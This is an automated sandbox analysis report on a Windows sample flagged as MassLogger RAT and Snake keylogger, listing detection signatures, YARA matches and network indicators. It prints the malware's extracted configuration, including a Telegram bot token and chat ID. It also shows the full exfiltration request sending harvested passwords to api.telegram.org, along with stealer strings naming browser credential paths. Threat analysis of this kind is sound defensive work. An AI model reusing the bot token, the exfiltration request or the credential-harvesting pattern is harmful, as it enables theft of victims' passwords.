Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JWPRnfqs3n.exe

Overview

General Information

Sample name:JWPRnfqs3n.exe
renamed because original name is a hash value
Original sample name:278d8f1d42cc9c240dcaee341104615fda13571ca36748ce099ebf7740875905.exe
Analysis ID:1588982
MD5:820c5b5f7fd86172a9637e4af12fad06
SHA1:84605205d8d9b391b8ac5fb1a2059d8b2ade5bab
SHA256:278d8f1d42cc9c240dcaee341104615fda13571ca36748ce099ebf7740875905
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • JWPRnfqs3n.exe (PID: 2444 cmdline: "C:\Users\user\Desktop\JWPRnfqs3n.exe" MD5: 820C5B5F7FD86172A9637E4AF12FAD06)
    • RegSvcs.exe (PID: 2172 cmdline: "C:\Users\user\Desktop\JWPRnfqs3n.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM", "Telegram Chatid": "7455776561"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xef73:$a1: get_encryptedPassword
        • 0xf29b:$a2: get_encryptedUsername
        • 0xed0e:$a3: get_timePasswordChanged
        • 0xee2f:$a4: get_passwordField
        • 0xef89:$a5: set_encryptedPassword
        • 0x108e5:$a7: get_logins
        • 0x10596:$a8: GetOutlookPasswords
        • 0x10388:$a9: StartKeylogger
        • 0x10835:$a10: KeyLoggerEventArgs
        • 0x103e5:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          8.2.RegSvcs.exe.370000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            8.2.RegSvcs.exe.370000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.RegSvcs.exe.370000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                8.2.RegSvcs.exe.370000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf173:$a1: get_encryptedPassword
                • 0xf49b:$a2: get_encryptedUsername
                • 0xef0e:$a3: get_timePasswordChanged
                • 0xf02f:$a4: get_passwordField
                • 0xf189:$a5: set_encryptedPassword
                • 0x10ae5:$a7: get_logins
                • 0x10796:$a8: GetOutlookPasswords
                • 0x10588:$a9: StartKeylogger
                • 0x10a35:$a10: KeyLoggerEventArgs
                • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
                8.2.RegSvcs.exe.370000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
                • 0x14729:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 10 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:59:21.602330+010020577441Malware Command and Control Activity Detected192.168.2.749737149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:59:14.463875+010028032742Potentially Bad Traffic192.168.2.749699132.226.247.7380TCP
                2025-01-11T07:59:20.682598+010028032742Potentially Bad Traffic192.168.2.749699132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:59:21.307506+010018100081Potentially Bad Traffic192.168.2.749737149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM", "Telegram Chatid": "7455776561"}
                Source: RegSvcs.exe.2172.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendMessage"}
                Source: JWPRnfqs3n.exeReversingLabs: Detection: 79%
                Source: JWPRnfqs3n.exeVirustotal: Detection: 66%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: JWPRnfqs3n.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: JWPRnfqs3n.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49700 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: JWPRnfqs3n.exe, 00000005.00000003.1324807314.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, JWPRnfqs3n.exe, 00000005.00000003.1324641312.0000000003650000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: JWPRnfqs3n.exe, 00000005.00000003.1324807314.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, JWPRnfqs3n.exe, 00000005.00000003.1324641312.0000000003650000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0086445A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086C6D1 FindFirstFileW,FindClose,5_2_0086C6D1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086EF95
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086F0F2
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086F3F3
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008637EF
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00863B12
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086BCBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F78C5h8_2_050F76E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F824Fh8_2_050F76E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h8_2_050FAE88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F6808h8_2_050F6560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F18A0h8_2_050F15F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F56A8h8_2_050F5400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F3708h8_2_050F3460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F0740h8_2_050F0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F2A00h8_2_050F2758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F49A0h8_2_050F46F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F63B0h8_2_050F6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F1448h8_2_050F11A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F32B0h8_2_050F3008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F02E8h8_2_050F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F25A8h8_2_050F2300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F4548h8_2_050F42A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F0FF0h8_2_050F0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_050FBC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F5F58h8_2_050F5CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F5250h8_2_050F4FA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F40F0h8_2_050F3E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F2150h8_2_050F1EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h8_2_050FB9C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F5B00h8_2_050F5858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F3B62h8_2_050F38B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F0B98h8_2_050F08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F4DF8h8_2_050F4B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F2E58h8_2_050F2BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_050F6BF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 050F1CF8h8_2_050F1A50

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49737 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49737 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455776561&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e38f96b8f2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 132.226.247.73:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49700 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_008722EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455776561&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e38f96b8f2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000008.00000002.3730877202.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455
                Source: RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00874164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00874164
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00874164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00874164
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00873F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00873F66
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_0086001C
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0088CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0088CABC

                System Summary

                barindex
                Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: This is a third-party compiled AutoIt script.5_2_00803B3A
                Source: JWPRnfqs3n.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: JWPRnfqs3n.exe, 00000005.00000000.1271534976.00000000008B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_51e74d52-e
                Source: JWPRnfqs3n.exe, 00000005.00000000.1271534976.00000000008B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_16d71928-1
                Source: JWPRnfqs3n.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ac3e161-9
                Source: JWPRnfqs3n.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6bd7cbbc-2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_0086A1EF
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00858310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00858310
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_008651BD
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0080E6A05_2_0080E6A0
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082D9755_2_0082D975
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0080FCE05_2_0080FCE0
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008221C55_2_008221C5
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008362D25_2_008362D2
